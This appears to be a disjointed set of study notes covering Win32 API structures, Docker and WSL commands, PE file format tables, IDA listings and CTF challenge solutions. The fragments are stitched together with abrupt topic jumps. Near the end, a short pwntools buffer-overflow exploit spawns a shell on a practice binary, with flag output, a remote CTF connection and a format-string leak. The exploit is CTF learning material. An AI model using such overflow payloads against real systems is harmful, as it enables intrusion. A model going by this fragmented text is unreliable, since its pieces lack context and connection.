typedef struct tagTEXTMETRICA {
    LONG tmHeight;           // total height of the font
    LONG tmAscent;           // height above the baseline
    LONG tmDescent;          // height below the baseline
    LONG tmInternalLeading;  // space reserved for accent marks
    LONG tmExternalLeading;  // line spacing
    LONG tmAveCharWidth;     // weighted average character width
    LONG tmMaxCharWidth;     // width of the widest character
    LONG tmWeight;           // font weight
    LONG tmOverhang;         // extra width added when a string is bold or italic
    LONG tmDigitizedAspectX;
    LONG tmDigitizedAspectY;
    BYTE tmFirstChar;        // code of the first character in the font
    BYTE tmLastChar;
    BYTE tmDefaultChar;
    BYTE tmBreakChar;
    BYTE tmItalic;
    BYTE tmUnderlined;
    BYTE tmStruckOut;
    BYTE tmPitchAndFamily;   // whether the font is fixed pitch: low bit 1 = variable pitch, 0 = fixed pitch
    BYTE tmCharSet;
} TEXTMETRICA, *PTEXTMETRICA, *NPTEXTMETRICA, *LPTEXTMETRICA;
case WM_LBUTTONDOWN:
    static int cLBUTTONDOWN;  // the static variable is defined once and persists across messages
    ++cLBUTTONDOWN;
    TCHAR szBuffer[100];      // the local variable is recreated on every message
    wsprintf(szBuffer, TEXT("this is the %d time you click the left button"), cLBUTTONDOWN);  // format the string into szBuffer
    hdc = GetDC(hwnd);
    GetClientRect(hwnd, &rect);
    DrawText(hdc, szBuffer, -1, &rect, DT_SINGLELINE | DT_CENTER | DT_VCENTER);
    ReleaseDC(hwnd, hdc);
    return 0;
The counter cLBUTTONDOWN is updated every time the left mouse button is pressed.
Explicit multi-line output
The example given in Windows 32 programming prints all the system parameters from SystemMetrics.
The result is shown in the figure.
We now have a prototype of a window program.
Using GetSystemMetrics to get system parameters
int GetSystemMetrics( [in] int nIndex );
This function takes an index as its parameter: it looks up the nIndex-th element of the SystemMetrics table.
What does that table look like?
Value  Meaning
SM_ARRANGE  56
The flags that specify how the system arranged minimized windows. For more information, see the Remarks section in this topic.
SM_CLEANBOOT  67
The value that specifies how the system is started: 0 Normal boot; 1 Fail-safe boot; 2 Fail-safe with network boot. A fail-safe boot (also called SafeBoot, Safe Mode, or Clean Boot) bypasses the user startup files.
SM_CMONITORS  80
The number of display monitors on a desktop. For more information, see the Remarks section in this topic.
typedef struct tagSCROLLINFO {  // SCROLLINFO structure
    UINT cbSize;      // sizeof(SCROLLINFO)
    UINT fMask;       // which values to set or retrieve
    int  nMin;        // minimum of the range
    int  nMax;        // maximum of the range
    UINT nPage;       // page size
    int  nPos;        // current position
    int  nTrackPos;   // current tracking position
} SCROLLINFO, *LPSCROLLINFO;
cout << "right!" << endl;
cout << "flag:MRCTF{md5(" << final << ")}" << endl;
cout << "md5()->{32/upper case/put the string into the function and transform into md5 hash}" << endl;
system("pause");
┌──(root㉿Executor)-[/mnt/c/Users/86135/Desktop/MRCTF2020/EzCPP]
└─# ./EasyCPP
give me your key!
2345 1222 5774 2476 3374 9032 2456 3531 6720
right!
flag:MRCTF{md5(234512225774247633749032245635316720)}
md5()->{32/upper case/put the string into the function and transform into md5 hash}
sh: 1: pause: not found
WARNING: No blkio throttle.read_bps_device support
WARNING: No blkio throttle.write_bps_device support
WARNING: No blkio throttle.read_iops_device support
WARNING: No blkio throttle.write_iops_device support
Using Docker images
Searching for images in the registry
docker search <镜像>
root@Executor:/home/docker# docker search httpd
NAME                      DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
httpd                     The Apache HTTP Server Project                  4090      [OK]
centos/httpd-24-centos7   Platform for running Apache httpd 2.4 or bui…   44
centos/httpd                                                              35                   [OK]
clearlinux/httpd          httpd HyperText Transfer Protocol (HTTP) ser…   2
...
STARS indicates how authoritative the image is.
OFFICIAL indicates whether the image is an official image.
Pulling an image from the registry
To build a custom, fully-featured Ubuntu image, you first need a clean base image.
docker pull <repository>:<tag>
Here the repository name is usually the operating system name, e.g. ubuntu, and the tag is the operating system version, e.g. 20.04,
because Docker repositories are usually named after the operating system, and the image files in them after the corresponding OS version.
root@Executor:~# docker pull ubuntu:20.04
20.04: Pulling from library/ubuntu
d7bfe07ed847: Pull complete
Digest: sha256:fd92c36d3cb9b1d027c4d2a72c6bf0125da82425fc2ca37c414d4f010180dc19
Status: Downloaded newer image for ubuntu:20.04
docker.io/library/ubuntu:20.04
Listing local images
root@Executor:~# docker images
REPOSITORY                    TAG       IMAGE ID       CREATED       SIZE
ubuntu                        20.04     20fffa419e3a   6 weeks ago   72.8MB
ansible/ubuntu14.04-ansible   latest    4621d4fe2959   6 years ago   461MB
Column      Meaning
REPOSITORY  image repository source
TAG         image tag
IMAGE ID    image ID
CREATED     image creation time
SIZE        image size
An image can be uniquely identified by repository:tag, or directly by its image ID.
Deleting a local image
docker rmi <image>
Here the image is specified either as repository:tag or by image ID.
You don't even need to type the full value to identify a single image;
for example, just the first two or three characters of the image ID.
root@Executor:~# docker images
REPOSITORY                    TAG       IMAGE ID       CREATED        SIZE
ubuntu                        20.04     20fffa419e3a   6 weeks ago    72.8MB
ubuntu                        18.04     5a214d77f5d7   9 months ago   63.1MB
ansible/ubuntu14.04-ansible   latest    4621d4fe2959   6 years ago    461MB
root@Executor:~# docker rmi 5a
Untagged: ubuntu:18.04
Untagged: ubuntu@sha256:0fedbd5bd9fb72089c7bbca476949e10593cebed9b1fb9edf5b79dbbacddd7d6
Deleted: sha256:5a214d77f5d747e6ed81632310baa6190301feeb875cf6bf9da560108fa09972
Deleted: sha256:824bf068fd3dc3ad967022f187d85250eb052f61fe158486b2df4e002f6f984e
root@Executor:/home/docker# docker images
REPOSITORY   TAG       IMAGE ID       CREATED          SIZE
ssh/ubuntu   latest    886ba4c00ba4   27 seconds ago   235MB
ubuntu       20.04     20fffa419e3a   6 weeks ago      72.8MB
root@Executor:~# docker ps -a
CONTAINER ID   IMAGE          COMMAND   CREATED            STATUS         PORTS     NAMES
49e5c3d8f7c6   ubuntu:20.04   "bash"    About an hour ago  Up 9 minutes             lucid_ramanujan
root@Executor:~# docker exec -it 49 bash
root@49e5c3d8f7c6:/# exit
exit
root@Executor:~# docker ps -a
CONTAINER ID   IMAGE          COMMAND   CREATED            STATUS         PORTS     NAMES
49e5c3d8f7c6   ubuntu:20.04   "bash"    About an hour ago  Up 9 minutes             lucid_ramanujan
To leave the container, use exit or Ctrl+D.
Exporting/importing containers
Export a container as a tar archive
docker export <container> > <path>
For example, export the container 49e5c3d8f7c6 (with ssh installed) to the current directory
root@Executor:/home/docker# docker export 49 > ssh-ubuntu.tar
root@Executor:/home/docker# ls
ssh-ubuntu.tar
Import the tar archive as an image (it cannot be imported directly as a container)
docker import [OPTIONS] <tarball> <image>
Import the tar archive as an image with the given name
root@Executor:/home/docker# ls
ssh-ubuntu.tar
root@Executor:/home/docker# docker import ssh-ubuntu.tar ssh/ubuntu
sha256:725bf542d42fc0f7aad48f47ef2b81d1bcf7931bd1283a2b91ccbd3f8246e876
root@Executor:/home/docker# docker images
REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
ssh/ubuntu   latest    725bf542d42f   5 seconds ago   234MB
ubuntu       20.04     20fffa419e3a   6 weeks ago     72.8MB
root@Executor:~# docker network ls
NETWORK ID     NAME      DRIVER    SCOPE
3ce19195196f   bridge    bridge    local
c1341214f1d0   host      host      local
d4e52924ce6b   none      null      local
cat > /etc/apt/sources.list << EOF
deb http://mirrors.aliyun.com/debian/ stretch main non-free contrib
deb-src http://mirrors.aliyun.com/debian/ stretch main non-free contrib
deb http://mirrors.aliyun.com/debian-security stretch/updates main
deb-src http://mirrors.aliyun.com/debian-security stretch/updates main
deb http://mirrors.aliyun.com/debian/ stretch-updates main non-free contrib
deb-src http://mirrors.aliyun.com/debian/ stretch-updates main non-free contrib
deb http://mirrors.aliyun.com/debian/ stretch-backports main non-free contrib
deb-src http://mirrors.aliyun.com/debian/ stretch-backports main non-free contrib
EOF
docker run -dit -p 10011:80 apache/ubuntu:latest /bin/bash -c "/start.sh"
-d: run in the background
-it: start an interactive terminal
-p 10011:80: map port 10011 on WSL to port 80 in the container
apache/ubuntu:latest: the name of our custom image
/bin/bash -c "/start.sh": command-line arguments, executed automatically right after startup
No network mode is specified, so the default is bridge mode
No transport-layer protocol is specified for the port, so the default is TCP
root@Executor:~# docker run -dit -p 10011:80 apache/ubuntu /bin/bash -c "/start.sh"
edc1b61f6c7a20ce4d85989ffa4c5042dc13769161f4d89952604a8496b869d1
root@Executor:~# docker ps -a
CONTAINER ID   IMAGE           COMMAND                  CREATED         STATUS        PORTS                                     NAMES
edc1b61f6c7a   apache/ubuntu   "docker-php-entrypoi…"   2 seconds ago   Up 1 second   0.0.0.0:10011->80/tcp, :::10011->80/tcp   friendly_northcutt
root@Executor:~# docker ps -a
CONTAINER ID   IMAGE           COMMAND                  CREATED          STATUS          PORTS                                     NAMES
edc1b61f6c7a   apache/ubuntu   "docker-php-entrypoi…"   12 minutes ago   Up 11 minutes   0.0.0.0:10011->80/tcp, :::10011->80/tcp   friendly_northcutt
deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ bionic-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ bionic-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ bionic-proposed main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ bionic-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ bionic-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ bionic-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ bionic-proposed main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ bionic-backports main restricted universe multiverse
Justifies the text to the bottom of the rectangle. This value is used only with the DT_SINGLELINE value.
DT_CALCRECT
Determines the width and height of the rectangle. If there are multiple lines of text, DrawText uses the width of the rectangle pointed to by the lpRect parameter and extends the base of the rectangle to bound the last line of text. If the largest word is wider than the rectangle, the width is expanded. If the text is less than the width of the rectangle, the width is reduced. If there is only one line of text, DrawText modifies the right side of the rectangle so that it bounds the last character in the line. In either case, DrawText returns the height of the formatted text but does not draw the text.
typedef struct _IMAGE_FILE_HEADER {
    WORD  Machine;
    WORD  NumberOfSections;
    DWORD TimeDateStamp;
    DWORD PointerToSymbolTable;
    DWORD NumberOfSymbols;
    WORD  SizeOfOptionalHeader;
    WORD  Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
Relocation information was stripped from the file. The file must be loaded at its preferred base address. If the base address is not available, the loader reports an error.
IMAGE_FILE_EXECUTABLE_IMAGE  0x0002
The file is executable (there are no unresolved external references).
IMAGE_FILE_LINE_NUMS_STRIPPED  0x0004
COFF line numbers were stripped from the file.
IMAGE_FILE_LOCAL_SYMS_STRIPPED  0x0008
COFF symbol table entries were stripped from the file.
IMAGE_FILE_AGGRESIVE_WS_TRIM  0x0010
Aggressively trim the working set. This value is obsolete.
IMAGE_FILE_LARGE_ADDRESS_AWARE  0x0020
The application can handle addresses larger than 2 GB.
IMAGE_FILE_BYTES_REVERSED_LO  0x0080
The bytes of the word are reversed. This flag is obsolete.
IMAGE_FILE_32BIT_MACHINE  0x0100
The computer supports 32-bit words.
IMAGE_FILE_DEBUG_STRIPPED  0x0200
Debugging information was removed and stored separately in another file.
IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP  0x0400
If the image is on removable media, copy it to and run it from the swap file.
IMAGE_FILE_NET_RUN_FROM_SWAP  0x0800
If the image is on the network, copy it to and run it from the swap file.
IMAGE_FILE_SYSTEM  0x1000
The image is a system file.
IMAGE_FILE_DLL  0x2000
The image is a DLL file. While it is an executable file, it cannot be run directly.
IMAGE_FILE_UP_SYSTEM_ONLY  0x4000
The file should be run only on a uniprocessor computer.
IMAGE_FILE_BYTES_REVERSED_HI  0x8000
The bytes of the word are reversed. This flag is obsolete.
These tables were added to the image to support a uniform mechanism for applications to delay the loading of a DLL until the first call into that DLL. The layout of the tables matches that of the traditional import tables that are described in section 6.4, "The .idata Section." Only a few details are discussed here.
.data:01008000 ; Section 2. (virtual address 00008000)
.data:01008000 ; Virtual size                  : 00001BA8 (   7080.)
.data:01008000 ; Section size in file          : 00000600 (   1536.)
.data:01008000 ; Offset to raw data for section: 00007200
.data:01008000 ; Flags C0000040: Data Readable Writable
.data:01008000 ; Alignment     : default
.data:01008000 ; ===========================================================================
.data:01008000
.data:01008000 ; Segment type: Pure data
.data:01008000 ; Segment permissions: Read/Write
.data:01008000 _data           segment para public 'DATA' use32
.data:01008000                 assume cs:_data
.data:01008000                 ;org 1008000h
.data:01008000 ; BYTE Data
.data:01008000 Data            dd 78h                  ; DATA XREF: NPCommand(x,x,x)+4D6↑r
.data:01008000                                         ; NPCommand(x,x,x)+569↑w ...
.data:01008004 dword_1008004   dd 1                    ; DATA XREF: CheckSave(x)+27↑r
.data:01008004                                         ; CheckSave(x)+65↑r ...
.data:01008008 ; WCHAR ClassName
.data:01008008 ClassName:                              ; DATA XREF: sub_1004143+59↑o
.data:01008008                                         ; NPInit(x,x,x,x)+10D↑o
.data:01008008                 text "UTF-16LE", 'Notepad',0
.data:01008018 ; int dword_1008018
.data:01008018 dword_1008018   dd 0FFFFFFFFh           ; DATA XREF: NpSaveDialogHookProc(x,x,x,x)+94↑r
.data:01008018                                         ; NpOpenDialogHookProc(x,x,x,x)+4F↑w ...
....
The comment block that IDA gives at the start
.data:01008000 ; Section 2. (virtual address 00008000)
.data:01008000 ; Virtual size                  : 00001BA8 (   7080.)
.data:01008000 ; Section size in file          : 00000600 (   1536.)
.data:01008000 ; Offset to raw data for section: 00007200
.data:01008000 ; Flags C0000040: Data Readable Writable
.data:01008000 ; Alignment     : default
Section 2 (relative virtual address 8000h)
Size in virtual memory: 1BA8h bytes
Size in the file on disk: 600h bytes
Base address of this section in the file on disk: 7200h
Flags: C0000040, a data section that is readable and writable, not executable
Alignment: default
ImageBase
The base address of the process in its virtual address space, i.e. the PE header will be loaded starting at address 0x1000000.
This has already been confirmed many times in the earlier experiments.
Microsoft's explanation is:
The preferred address of the first byte of the image when it is loaded in memory. This value is a multiple of 64K bytes. The default value for DLLs is 0x10000000. The default value for applications is 0x00400000, except on Windows CE where it is 0x00010000.
Code integrity checks are forced. If you set this flag and a section contains only uninitialized data, set the PointerToRawData member of IMAGE_SECTION_HEADER for that section to zero; otherwise, the image will fail to load because the digital signature cannot be verified.
IMAGE_DLLCHARACTERISTICS_NX_COMPAT  0x0100
The image is compatible with data execution prevention (DEP).
IMAGE_DLLCHARACTERISTICS_NO_ISOLATION  0x0200
The image is isolation aware, but should not be isolated.
IMAGE_DLLCHARACTERISTICS_NO_SEH  0x0400
The image does not use structured exception handling (SEH). No handlers can be called in this image.
The section should not be padded to the next boundary. This flag is obsolete and is replaced by IMAGE_SCN_ALIGN_1BYTES.
0x00000010
Reserved.
IMAGE_SCN_CNT_CODE  0x00000020
The section contains executable code.
IMAGE_SCN_CNT_INITIALIZED_DATA  0x00000040
The section contains initialized data.
IMAGE_SCN_CNT_UNINITIALIZED_DATA  0x00000080
The section contains uninitialized data.
IMAGE_SCN_LNK_OTHER  0x00000100
Reserved.
IMAGE_SCN_LNK_INFO  0x00000200
The section contains comments or other information. This is valid only for object files.
0x00000400
Reserved.
IMAGE_SCN_LNK_REMOVE  0x00000800
The section will not become part of the image. This is valid only for object files.
IMAGE_SCN_LNK_COMDAT  0x00001000
The section contains COMDAT data. This is valid only for object files.
0x00002000
Reserved.
IMAGE_SCN_NO_DEFER_SPEC_EXC  0x00004000
Reset speculative exceptions handling bits in the TLB entries for this section.
IMAGE_SCN_GPREL  0x00008000
The section contains data referenced through the global pointer.
0x00010000
Reserved.
IMAGE_SCN_MEM_PURGEABLE  0x00020000
Reserved.
IMAGE_SCN_MEM_LOCKED  0x00040000
Reserved.
IMAGE_SCN_MEM_PRELOAD  0x00080000
Reserved.
IMAGE_SCN_ALIGN_1BYTES  0x00100000
Align data on a 1-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_2BYTES  0x00200000
Align data on a 2-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_4BYTES  0x00300000
Align data on a 4-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_8BYTES  0x00400000
Align data on an 8-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_16BYTES  0x00500000
Align data on a 16-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_32BYTES  0x00600000
Align data on a 32-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_64BYTES  0x00700000
Align data on a 64-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_128BYTES  0x00800000
Align data on a 128-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_256BYTES  0x00900000
Align data on a 256-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_512BYTES  0x00A00000
Align data on a 512-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_1024BYTES  0x00B00000
Align data on a 1024-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_2048BYTES  0x00C00000
Align data on a 2048-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_4096BYTES  0x00D00000
Align data on a 4096-byte boundary. This is valid only for object files.
IMAGE_SCN_ALIGN_8192BYTES  0x00E00000
Align data on an 8192-byte boundary. This is valid only for object files.
IMAGE_SCN_LNK_NRELOC_OVFL  0x01000000
The section contains extended relocations. The count of relocations for the section exceeds the 16 bits that is reserved for it in the section header. If the NumberOfRelocations field in the section header is 0xffff, the actual relocation count is stored in the VirtualAddress field of the first relocation. It is an error if IMAGE_SCN_LNK_NRELOC_OVFL is set and there are fewer than 0xffff relocations in the section.
Called by the compiler when you have more than one page of local variables in your function.

_chkstk Routine is a helper routine for the C compiler. For x86 compilers, _chkstk Routine is called when the local variables exceed 4K bytes; for x64 compilers it is 8K.

Windows pages in extra stack for your thread as it is used. At the end of the stack, there is one guard page mapped as inaccessible memory -- if the program accesses it (because it is trying to use more stack than is currently mapped), there's an access violation. The OS catches the fault, maps in another page of stack at the same address as the old guard page, creates a new guard page just beyond the old one, and resumes from the instruction that caused the violation.

If a function has more than one page of local variables, then the first address it accesses might be more than one page beyond the current end of the stack. Hence it would miss the guard page and trigger an access violation that the OS doesn't realise is because more stack is needed. If the total stack required is particularly huge, it could perhaps even reach beyond the guard page, beyond the end of the virtual address space assigned to stack, and into memory that's actually in use for something else.

So, _chkstk ensures that there is enough space for the local variables. You can imagine that it does this by touching the memory for the local variables at page-sized intervals, in increasing order, to ensure that it doesn't miss the guard page (so-called "stack probes"). I don't know whether it actually does that, though, possibly it takes a more direct route and instructs the OS to map in a certain amount of stack. Either way, if the total required is greater than the virtual address space available for stack, then the OS can complain about it instead of doing something undefined.
...
-00000006                 db ? ; undefined
-00000005                 db ? ; undefined
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008
+00000008 ; end of stack variables
NAME            FRIENDLY NAME
Ubuntu          Ubuntu
Debian          Debian GNU/Linux
kali-linux      Kali Linux Rolling
openSUSE-42     openSUSE Leap 42
SLES-12         SUSE Linux Enterprise Server v12
Ubuntu-16.04    Ubuntu 16.04 LTS
Ubuntu-18.04    Ubuntu 18.04 LTS
Ubuntu-20.04    Ubuntu 20.04 LTS
PS C:\Users\86135\Desktop\pwn> wsl -u root
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(root㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn]
└─# exit
logout
PS C:\Users\86135\Desktop\pwn> wsl -u kali
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
PS C:\Users\86135\Desktop\pwn> kali config --default-user root
PS C:\Users\86135\Desktop\pwn> kali
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(root㉿Executor)-[~]
└─#
适用于 Linux 的 Windows 子系统最后更新于 2022/4/21
适用于 Linux 的 Windows 子系统内核可以使用“wsl --update”手动更新,但由于你的系统设置,无法进行自动更新。
若要接收自动内核更新,请启用 Windows 更新设置:“在更新 Windows 时接收其他 Microsoft 产品的更新”。
有关详细信息,请访问https://aka.ms/wsl2kernel。
Windows 更新已暂停。
┌──(root㉿Executor)-[~]
└─# ipconfig
-bash: ipconfig: command not found
┌──(root㉿Executor)-[~]
└─# ipconfig.exe
Windows IP 配置
以太网适配器 以太网:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接 ...
You can also use WSL to launch windowed applications from the host system that have been added to the PATH.
You can also invoke the host system's cmd from WSL and switch to the host's cmd terminal.
┌──(root㉿Executor)-[~]
└─# cmd.exe
'\\wsl.localhost\kali-linux\root'
用作为当前目录的以上路径启动了 CMD.EXE。
UNC 路径不受支持。默认值设为 Windows 目录。
Microsoft Windows [版本 10.0.22000.675]
(c) Microsoft Corporation。保留所有权利。
PS C:\Users\86135\Desktop\pwn> wsl ls -l
total 108
drwxrwxrwx 1 kali kali  4096 Jun  2 19:52 CGfsb
drwxrwxrwx 1 kali kali  4096 May 19 23:14 cgpwn
drwxrwxrwx 1 kali kali  4096 Jun 20 09:55 dice_game
drwxrwxrwx 1 kali kali  4096 Jun 19 23:09 forgot
drwxrwxrwx 1 kali kali  4096 May 11 17:45 get_shell
drwxrwxrwx 1 kali kali  4096 May 20 09:28 guess_num
drwxrwxrwx 1 kali kali  4096 May 11 09:51 hello_pwn
drwxrwxrwx 1 kali kali  4096 May 20 08:45 int_overflow
drwxrwxrwx 1 kali kali  4096 May 11 17:38 level0
drwxrwxrwx 1 kali kali  4096 May 11 21:08 level2
drwxrwxrwx 1 kali kali  4096 Jun  3 16:27 level3
drwxrwxrwx 1 kali kali  4096 Jun 21 10:30 mytest
-rwxrwxrwx 1 kali kali 84286 Jun  3 16:10 pwn.md
drwxrwxrwx 1 kali kali  4096 Jun 19 23:38 reactor
drwxrwxrwx 1 kali kali  4096 Jun 20 00:28 realtime
drwxrwxrwx 1 kali kali  4096 Jun 20 10:06 stack2
drwxrwxrwx 1 kali kali  4096 Jun  3 10:56 string
drwxrwxrwx 1 kali kali  4096 May 29 16:03 testPIE
# Settings apply across all Linux distros running on WSL 2
[wsl2]   # the first line of the body must be a section marker like [wsl2]
# Limits VM memory to use no more than 4 GB, this can be set as whole numbers using GB or MB
memory=4GB   # cap memory at 4 GB
# Sets the VM to use two virtual processors
processors=8   # use 8 processors
┌──(root㉿Executor)-[/home]
└─# cat /etc/resolv.conf
# This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf:
# [network]
# generateResolvConf = false
nameserver 172.25.144.1
┌──(root㉿Executor)-[/home/dustball/kernelROP/mydev]
└─# uname -a
Linux Executor 5.8.13-dustland #1 SMP Sun Mar 24 13:56:15 CST 2024 x86_64 GNU/Linux
Specifying the kernel location
For example, write this in ~/.wslconfig on Windows
# Settings apply across all Linux distros running on WSL 2
[wsl2]
kernel=C:\\opt\\kernel
# Limits VM memory to use no more than 4 GB, this can be set as whole numbers using GB or MB
memory=4GB   # cap memory at 4 GB

# Sets the VM to use two virtual processors
processors=8   # use 8 processors
-00000074 v2              db 32 dup(?)
-00000054 v3              db 40 dup(?)
-0000002C s               db 32 dup(?) ; string(C)
-0000000C v5              dd ?
-00000008 i               dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008
+00000008 ; end of stack variables
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/forgot]
└─$ python3 exp.py
[+] Opening connection to 111.200.241.244 on port 51086: Done
/mnt/c/Users/86135/Desktop/pwn/forgot/exp.py:23: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  sh.sendline('vader')
[*] Switching to interactive mode
I should give you a pointer perhaps. Here: 8048654
Enter the string to be validate > cyberpeace{4edfc4922cff2900b97255284e605051}
[*] Got EOF while reading in interactive
Wrong ideas
Mistake 1
At the start of the loop
for ( i = 0; ; ++i )
{
    v0 = i;
    if ( v0 >= strlen(v2) )
        break;
    ....
-0000000000000200 v5              db 512 dup(?)
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
The first 512+8=520 bytes can be overflowed with anything;
the next eight bytes are overflowed with the address of the shell function, 0x4005F6.
Honestly, this one is a bit too easy.
from pwn import *
sh=process('./reactor')
sh.recv()
payload=(520*'a').encode()+p64(0x4005f6)
sh.sendline(payload)
sh.interactive()
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/reactor]
└─$ python3 exp.py
[+] Starting local process './reactor': pid 44
[*] Switching to interactive mode
$ whoami
kali
cyberpeace{a6053fab9ffe26d2ddc53ce7f78e08be}
Real-time data monitoring
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/realtime]
└─$ checksec realtime
[*] '/mnt/c/Users/86135/Desktop/pwn/realtime/realtime'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
┌──(kali㉿Executor)-[/mnt/c/Users/86135/Desktop/pwn/realtime]
└─$ python3 exp.py
[+] Starting local process './realtime': pid 77
[*] Switching to interactive mode
[*] Process './realtime' stopped with exit code 0 (pid 77)
AAAA-0xf7f5ace0-0xff8a6a84-(nil)-0x1-0x80483a0-0xff8a6a28-0x80484e7-0xff8a6820-0x200-0xf7f2b580-(nil)-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d
The location of key is 0804a048, and its value is 00000000,not the 0x02223322.
(╯°Д°)╯︵ ┻━┻
[*] Got EOF while reading in interactive